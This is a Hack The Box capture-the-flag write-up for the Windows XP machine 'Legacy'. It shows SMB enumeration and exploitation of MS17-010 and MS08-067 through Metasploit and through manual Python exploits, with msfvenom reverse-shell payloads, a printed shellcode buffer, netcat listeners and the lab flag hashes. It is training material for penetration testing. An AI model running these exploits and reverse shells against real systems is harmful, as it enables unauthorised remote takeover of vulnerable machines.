Metadata

Difficulty: Easy
OS: Windows
Release Date: 15 Mar, 2017

Enumeration

Nmap

We start by running nmap to discover the open ports on the machine.

┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ sudo nmap -sC -sV -oA nmap/initial 10.129.227.181
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-14 13:33 EST
Nmap scan report for 10.129.227.181
Host is up (0.11s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:96:2e:83 (VMware)
|_clock-skew: mean: 5d00h57m39s, deviation: 1h24m50s, median: 4d23h57m39s
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2024-02-19T22:31:36+02:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.78 seconds

From the Nmap scan, we discovered that SMB is running on the Windows XP operating system. As this is an old operating system, the chances of it being vulnerable are high.

Before we start looking for the vulnerability, it is always worth starting another nmap scan to look for open UDP ports in the background (just to save some time in case we are following any rabbit holes). The following command can be used to look for UDP open ports:

nmap -sU -p- --min-rate 10000 -oA nmap/udpscan 10.129.227.181

Port 139,445/TCP - SMB

Running smbmap to see what we can access without credentials.

┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ smbmap -H 10.129.227.181     
...
 ------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
[!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) on line 970
...

Access was denied. We can also confirm similar behavior with smbclient as well.

┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ smbclient -N -L //10.129.227.181
session setup failed: NT_STATUS_INVALID_PARAMETER

Nmap Scripting Engine (NSE) scripts can be used to look for vulnerabilities on the server. The following command can be utilized to look for SMB vulnerabilities on port 445:

┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ sudo nmap --script smb-vuln* -p 445 -oA nmap/smb_vulns 10.129.227.181
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-14 14:10 EST
Nmap scan report for 10.129.227.181
Host is up (0.10s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

Nmap done: 1 IP address (1 host up) scanned in 5.93 seconds

From the scan result, we can see that this machine is vulnerable to two famous SMB exploits: ms17-010, and MS08-067.

Running searchsploit against both exploits:

searchsploit ms17-010
searchsploit ms08-067

From the results, the highlighted exploits look promising.

Exploitation

ms17-010

Running discovered Metasploit exploit with setting necessary options. It opened up Administrative meterpreter shell on vulnerable machine.

msf6 > use exploit/windows/smb/ms17_010_psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.129.227.181
RHOSTS => 10.129.227.181
msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 10.10.14.104:4444 
[*] 10.129.227.181:445 - Target OS: Windows 5.1
[*] 10.129.227.181:445 - Filling barrel with fish... done
[*] 10.129.227.181:445 - <------------- | Entering Danger Zone | ------------->
[*] 10.129.227.181:445 -        [*] Preparing dynamite...
[*] 10.129.227.181:445 -                [*] Trying stick 1 (x86)...Boom!
[*] 10.129.227.181:445 -        [+] Successfully Leaked Transaction!
[*] 10.129.227.181:445 -        [+] Successfully caught Fish-in-a-barrel
[*] 10.129.227.181:445 - <------------- | Leaving Danger Zone | ------------->
[*] 10.129.227.181:445 - Reading from CONNECTION struct at: 0x86460660
[*] 10.129.227.181:445 - Built a write-what-where primitive...
[+] 10.129.227.181:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.129.227.181:445 - Selecting native target
[*] 10.129.227.181:445 - Uploading payload... slaLJsVT.exe
[*] 10.129.227.181:445 - Created \slaLJsVT.exe...
[+] 10.129.227.181:445 - Service started successfully...
[*] Sending stage (175686 bytes) to 10.129.227.181
[*] 10.129.227.181:445 - Deleting \slaLJsVT.exe...
[*] Meterpreter session 1 opened (10.10.14.104:4444 -> 10.129.227.181:1055) at 2024-02-14 16:30:31 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

Manual Exploitation (Without Metasploit)

You will find many public repos for MS17-010 out there. But only a few exploits work against the Windows XP operating system. We will be using the send_and_execute.py exploit from helviojunior's MS17-010 repo.

We will use msfvenom to generate payload using the following command:

┌──(kali㉿kali)-[~/Exploits/Windows/MS17-010]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.104 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o legacy_exploit.exe
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: legacy_exploit.exe

We will set up a listener to receive a connection on port 443 using netcat.

┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ nc -lnvp 443
listening on [any] 443 ...

Running send_and_execute.py exploit against the machine.

┌──(kali㉿kali)-[~/Exploits/Windows/MS17-010]
└─$ python2 send_and_execute.py 10.129.227.181 legacy_exploit.exe
Traceback (most recent call last):
  File "send_and_execute.py", line 2, in <module>
    from impacket import smb, smbconnection
ImportError: No module named impacket

We have one more hurdle to cross at this point. The latest version of Kali comes with impacket for python3. For our script to run we would need impacket for python2. The simple solution is to use virtualenv.

Troubleshooting
  • Install virtualenv for python2
pip2 install virtualenv
  • Now create a separate environment for impacket
/home/kali/.local/bin/virtualenv --python=/usr/bin/python2 impacket-venv
  • To activate the new virtual environment, run the following:
source impacket-venv/bin/activate
  • Installing an older version of impacket to avoid issues with dsinternals
pip install impacket==0.9.22

After running the troubleshooting steps, our exploit should run smoothly. Running send_and_execute.py exploit once again.

┌──(impacket-venv)─(kali㉿kali)-[~/Exploits/Windows/MS17-010]
└─$ python2 send_and_execute.py 10.129.227.181 legacy_exploit.exe
Trying to connect to 10.129.227.181:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x860b5da8
SESSION: 0xe116a9d0
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe121ab50
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe121abf0
overwriting token UserAndGroups
Sending file HINCZ4.exe...
Opening SVCManager on 10.129.227.181.....
Creating service RNxd.....
Starting service RNxd.....
The NETBIOS connection with the remote host timed out.
Removing service RNxd.....
ServiceExec Error on: 10.129.227.181
nca_s_proto_error
Done

Payload successfully executed on the machine and connection was received by the netcat listener.

┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.104] from (UNKNOWN) [10.129.227.181] 1073
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

ms08-067

Running discovered Metasploit exploit with setting necessary options. It opened up the Administrative meterpreter shell.

msf6 > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.129.227.181
RHOSTS => 10.129.227.181
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.10.14.104:4444 
[*] 10.129.227.181:445 - Automatically detecting the target...
[*] 10.129.227.181:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.129.227.181:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.129.227.181:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 10.129.227.181
[*] Meterpreter session 1 opened (10.10.14.104:4444 -> 10.129.227.181:1056) at 2024-02-14 16:40:11 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

Manual Exploitation (Without Metasploit)

For this purpose, we will be using ms08-067.py exploit from jivoi's pentest repo.

The script includes steps to generate shellcode using msfvenom. We can use the following command:

┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy/exploits]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.104 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
Found 12 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of c file: 1491 bytes
unsigned char buf[] = 
"\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
"\x0e\x32\x82\x69\xc2\x83\xee\xfc\xe2\xf4\xce\x6a\xeb\xc2"
"\x32\x82\x09\x4b\xd7\xb3\xa9\xa6\xb9\xd2\x59\x49\x60\x8e"
"\xe2\x90\x26\x09\x1b\xea\x3d\x35\x23\xe4\x03\x7d\xc5\xfe"
"\x53\xfe\x6b\xee\x12\x43\xa6\xcf\x33\x45\x8b\x30\x60\xd5"
"\xe2\x90\x22\x09\x23\xfe\xb9\xce\x78\xba\xd1\xca\x68\x13"
"\x63\x09\x30\xe2\x33\x51\xe2\x8b\x2a\x61\x53\x8b\xb9\xb6"
"\xe2\xc3\xe4\xb3\x96\x6e\xf3\x4d\x64\xc3\xf5\xba\x89\xb7"
"\xc4\x81\x14\x3a\x09\xff\x4d\xb7\xd6\xda\xe2\x9a\x16\x83"
"\xba\xa4\xb9\x8e\x22\x49\x6a\x9e\x68\x11\xb9\x86\xe2\xc3"
"\xe2\x0b\x2d\xe6\x16\xd9\x32\xa3\x6b\xd8\x38\x3d\xd2\xdd"
"\x36\x98\xb9\x90\x82\x4f\x6f\xea\x5a\xf0\x32\x82\x01\xb5"
"\x41\xb0\x36\x96\x5a\xce\x1e\xe4\x35\x7d\xbc\x7a\xa2\x83"
"\x69\xc2\x1b\x46\x3d\x92\x5a\xab\xe9\xa9\x32\x7d\xbc\x92"
"\x62\xd2\x39\x82\x62\xc2\x39\xaa\xd8\x8d\xb6\x22\xcd\x57"
"\xfe\xa8\x37\xea\x63\xc8\x3c\xea\x01\xc0\x32\x83\xd2\x4b"
"\xd4\xe8\x79\x94\x65\xea\xf0\x67\x46\xe3\x96\x17\xb7\x42"
"\x1d\xce\xcd\xcc\x61\xb7\xde\xea\x99\x77\x90\xd4\x96\x17"
"\x5a\xe1\x04\xa6\x32\x0b\x8a\x95\x65\xd5\x58\x34\x58\x90"
"\x30\x94\xd0\x7f\x0f\x05\x76\xa6\x55\xc3\x33\x0f\x2d\xe6"
"\x22\x44\x69\x86\x66\xd2\x3f\x94\x64\xc4\x3f\x8c\x64\xd4"
"\x3a\x94\x5a\xfb\xa5\xfd\xb4\x7d\xbc\x4b\xd2\xcc\x3f\x84"
"\xcd\xb2\x01\xca\xb5\x9f\x09\x3d\xe7\x39\x89\xdf\x18\x88"
"\x01\x64\xa7\x3f\xf4\x3d\xe7\xbe\x6f\xbe\x38\x02\x92\x22"
"\x47\x87\xd2\x85\x21\xf0\x06\xa8\x32\xd1\x96\x17";

Replace generated shellcode in python exploit.

At this point start a listener to receive a connection on port 443 using netcat.

┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ nc -lnvp 443
listening on [any] 443 ...

Running ms08-067.py exploit against the machine.

┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy/exploits]
└─$ python2 ms08-067.py                                              
Install the following library to make this script work
Impacket : https://github.com/CoreSecurity/impacket.git
PyCrypto : https://pypi.python.org/pypi/pycrypto

Looks like a similar issue we encountered during the manual exploitation of the MS17-010 exploit. Following similar steps with virtualenv, and running the Python script:

┌──(impacket-venv)─(kali㉿kali)-[~/HackTheBox/machines/Legacy/exploits]
└─$ python2 ms08-067.py         
#######################################################################
#   MS08-067 Exploit
#   This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
#   The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
#   Mod in 2018 by Andy Acer
#   - Added support for selecting a target port at the command line.
#   - Changed library calls to allow for establishing a NetBIOS session for SMB transport
#   - Changed shellcode handling to allow for variable length shellcode.
#######################################################################


$   This version requires the Python Impacket library version to 0_9_17 or newer.
$
$   Here's how to upgrade if necessary:
$
$   git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
$   cd impacket
$   pip install .


#######################################################################


Usage: ms08-067.py <target ip> <os #> <Port #>

Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)

FYI: nmap has a good OS discovery script that pairs well with this exploit:
nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 192.168.1.1

The exploit requires us to know the version of the Windows and language pack. From the initial enumeration, we know the version is Windows XP. From examples, target 6 (Windows XP SP3 English (NX)) looks promising.

Running ms08-067.py exploit once again with necessary arguments:

┌──(impacket-venv)─(kali㉿kali)-[~/HackTheBox/machines/Legacy/exploits]
└─$ python2 ms08-067.py 10.129.227.181 6 445
#######################################################################
#   MS08-067 Exploit
#   This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
#   The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
#   Mod in 2018 by Andy Acer
#   - Added support for selecting a target port at the command line.
#   - Changed library calls to allow for establishing a NetBIOS session for SMB transport
#   - Changed shellcode handling to allow for variable length shellcode.
#######################################################################


$   This version requires the Python Impacket library version to 0_9_17 or newer.
$
$   Here's how to upgrade if necessary:
$
$   git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
$   cd impacket
$   pip install .


#######################################################################

Windows XP SP3 English (NX)

[-]Initiating connection
[-]connected to ncacn_np:10.129.227.181[\pipe\browser]
Exploit finish

Payload successfully executed on the machine and connection was received by the netcat listener.

┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.104] from (UNKNOWN) [10.129.227.181] 1076
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.

C:\WINDOWS\system32>

whoami

Our machine doesn't seem to have a whoami binary or command. Several useful Windows binaries are available by default on Kali OS.

┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ locate whoami.exe   
/usr/share/windows-resources/binaries/whoami.exe

The following command can be used to share the binaries folder over SMB:

┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ impacket-smbserver webhackery /usr/share/windows-resources/binaries/
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Running whoami.exe against the machine to confirm Administrative access.

C:\WINDOWS\system32>\\10.10.14.104\webhackery\whoami.exe
\\10.10.14.104\webhackery\whoami.exe
NT AUTHORITY\SYSTEM

Proof

user.txt

C:\Documents and Settings\john\Desktop>dir && hostname && type user.txt && ipconfig
dir && hostname && type user.txt && ipconfig
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\john\Desktop

16/03/2017  08:19     <DIR>          .
16/03/2017  08:19     <DIR>          ..
16/03/2017  08:19                 32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)   6.400.086.016 bytes free
legacy
e69af0e4f443de7e36876fda4ec7644f
Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : .htb
        IP Address. . . . . . . . . . . . : 10.129.227.181
        Subnet Mask . . . . . . . . . . . : 255.255.0.0
        Default Gateway . . . . . . . . . : 10.129.0.1

C:\Documents and Settings\john\Desktop>

root.txt

C:\Documents and Settings\Administrator\Desktop>dir && hostname && type root.txt && ipconfig        
dir && hostname && type root.txt && ipconfig
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\Administrator\Desktop

16/03/2017  08:18     <DIR>          .
16/03/2017  08:18     <DIR>          ..
16/03/2017  08:18                 32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   6.400.073.728 bytes free
legacy
993442d258b0e0ec917cae9e695d5713
Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : .htb
        IP Address. . . . . . . . . . . . : 10.129.227.181
        Subnet Mask . . . . . . . . . . . : 255.255.0.0
        Default Gateway . . . . . . . . . : 10.129.0.1

C:\Documents and Settings\Administrator\Desktop>
Share this post